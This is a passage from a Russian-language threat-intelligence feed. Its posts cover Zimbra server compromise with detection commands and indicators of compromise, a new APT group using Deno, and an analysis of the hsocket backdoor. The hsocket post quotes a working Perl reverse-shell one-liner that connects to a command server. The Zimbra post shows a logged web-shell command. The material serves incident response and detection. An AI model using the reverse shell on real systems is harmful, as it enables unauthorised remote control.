<p>2. Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.</p>
<p>Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newermt &#039;2026-07-01&#039;</code> (поиск по дате изменения файла)</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newerBt &#039;2026-07-01&#039;</code> (поиск по дате создания файла)</p>
<p><em>Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку.</p>
<p></em>Также проверьте сервер антивирусными средствами.</p>
<p>3. В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение <code>/var/log/nginx/access.log</code>) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах (в частности, часто используемый каталог <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>), могут свидетельствовать о наличии WEB-shell&#039;ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.</p>
<p>Пример вывода результата выполнения команды <code>ls</code> в браузер атакующего:</p>
<pre><code>[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889  

- [REDACTED_IP]: С2 адрес злоумышленников; 
- [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell; 
- public/bzng.jsp: расположение WEB-shell; 
- ls: выполняемая команда.</code></pre>
<p>Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы <a href="https://github.com/Ed1s0nZ/CyberStrikeAI" rel="noopener" target="_blank">CyberStrikeAI</a>, размещенные на нескольких С2-серверах (<em>скриншоты 1 и 2</em>).</p>
<figure class="wp-block-image"><img width="1024" height="834" src="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg 1024w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-300x244.jpg 300w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-768x625.jpg 768w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41.jpg 1045w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 1</figcaption></figure>
<p><code>CyberStrikeAI</code> — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.</p>
<figure class="wp-block-image"><img width="1024" height="523" src="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg 1024w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-300x153.jpg 300w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-768x392.jpg 768w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1536x784.jpg 1536w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-2048x1046.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 2</figcaption></figure>
<p>Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.</p>
<p>💡 <strong>Рекомендуем:</p>
<p></strong>1. Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.</p>
<p>2. В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета <code>zimbra-snmp</code>.</p>
<p>3. Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.</p>
<p><strong>Файловые индикаторы компрометации:</strong></p>
<blockquote>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.tx</code>t или <code>versions.txt</code> — файл, содержащий версию ПО Zimbra;</p>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp</code> — WEB-shell;</p>
<p><code>/opt/zimbra/log/defunct</code> — Gsocket;</p>
<p><code>elockc[a-z]</code> (например, <code>elockcl</code>) — шифровальщик;</p>
<p><code>runloop.sh</code> — скрипт, создаваемый шифровальщиком;</p>
<p><code>!README_RECOVER.txt</code> — записка злоумышленников;</p>
<p><code>*.elock</code> — файлы с расширением <code>.elock</code>.</p>
</blockquote>
<p><strong>Сетевые индикаторы компрометации:</strong></p>
<pre><code>135.136.63.63
139.28.49.138
146.70.169.246
193.24.211.91
193.32.126.168
31.177.110.136
37.32.73.156
64.62.156.162
64.62.156.222
64.62.156.94
88.214.21.183
89.116.171.182
89.117.94.35</code></pre>
<p><strong><br />
Gsocket:</strong></p>
<pre><code>*.gs.thc.org
gsocket.io
152.53.173.29
152.53.173.30
176.65.149.52
212.132.98.170
217.154.53.116
217.154.53.187
45.90.4.121
45.90.4.128
51.91.190.241
51.91.190.242</code></pre>
<p><span class="hashtag">#IR</span> <span class="hashtag">#CVE</span> <span class="hashtag">#Malware</span> <span class="hashtag">#detect</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Din, din — кто там?</title>
		<link>/ding-ding-whos-there/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Wed, 09 Sep 2026 12:17:40 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/din-din-%d0%ba%d1%82%d0%be-%d1%82%d0%b0%d0%bc/</guid>

					<description><![CDATA[Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали DENOmination Group. В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного,…]]></description>
										<content:encoded><![CDATA[<p><strong>Din, din — кто там?</strong> 🔔</p>
<p>Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали <strong>DENOmination Group</strong>.</p>
<p>В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного, военного, финансового и консалтингового секторов.</p>
<p>Ключевая особенность атак — использование легитимной среды выполнения Deno для запуска вредоносного JavaScript/TypeScript-кода. В исследованных цепочках мы наблюдали загрузчик DinDoor, агент удаленного доступа DenoRAT, вредоносные MSI- и LNK-файлы, ротацию C2-инфраструктуры и несколько связанных способов первоначальной доставки.</p>
<p>Пересечения в кодовой базе, конфигурационных параметрах, логике построения цепочек и сетевой инфраструктуре позволили связать наблюдаемые эпизоды с активностью одной группировки.</p>
<p>В исследовании разобрали архитектуру DinDoor и DenoRAT, механизмы закрепления и взаимодействия с C2, инфраструктурные пересечения, TTP и возможную модель использования общей платформы несколькими операторами.</p>
<p>Подробности —<strong> </strong><a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/denomination-group-deno-in-attack-chains-targeting-russian-organizations/?utm_source=tg_esc&#038;utm_medium=deno&#038;utm_campaign=09_09" rel="noopener" target="_blank">в нашем блоге</a> 🦖</p>
<p><span class="hashtag">#TI</span> <span class="hashtag">#APT</span> <span class="hashtag">#Malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Он вам не gsocket</title>
		<link>/hes-not-your-gsocket/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 08 Sep 2026 14:44:27 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bd-%d0%b2%d0%b0%d0%bc-%d0%bd%d0%b5-gsocket/</guid>

					<description><![CDATA[Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла…]]></description>
										<content:encoded><![CDATA[<p><strong>Он вам не gsocket</strong> 😑</p>
<p>В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент <code>hsocket</code> (не путать с <code>gsocket</code>).</p>
<p>После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.</p>
<p>1️⃣ <code>hsocket</code> — бэкдор, имеющий следующий функционал:</p>
<p>• запуск интерактивной командной оболочки</p>
<p>• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)</p>
<p>• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)</p>
<p>• защита файлов от удаления</p>
<p>• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:</p>
<pre><code>perl -e &quot;use Socket;\$i=\&quot;$hsHOST\&quot;;\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname(&#039;tcp&#039;));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,&#039;&gt;&amp;S&#039;);open(STDOUT,&#039;&gt;&amp;S&#039;);open(STDERR,&#039;&gt;&amp;S&#039;);exec(&#039;sh -i&#039;);};&quot;</code></pre>
<p>• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)</p>
<p>2️⃣ <code>hfsm</code> — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.</p>
<p>3️⃣ <code>.hsrc</code> — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.</p>
<p>В рамках данного исследования нам удалось <a href="https://alexiregar.wordpress.com/" rel="noopener" target="_blank">обнаружить статью</a>, написанную на индонезийском языке, в которой было описано данное ВПО.</p>
<p>Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:</p>
<pre><code>// Fungsi untuk tampilan halaman login
$Warning = &quot;### ⚠️Info!! Terdekteksi Aktivitas Dari&quot;;</code></pre>
<p>Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:</p>
<pre><code>//------------------GECKO SHELL, RECODED BY AYANA--------------------//
&lt;!-- Gecko Folder File Manager --&gt;</code></pre>
<p><strong>IoC:</strong></p>
<pre><code>hsocket.io
/tmp/hs-data/</code></pre>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
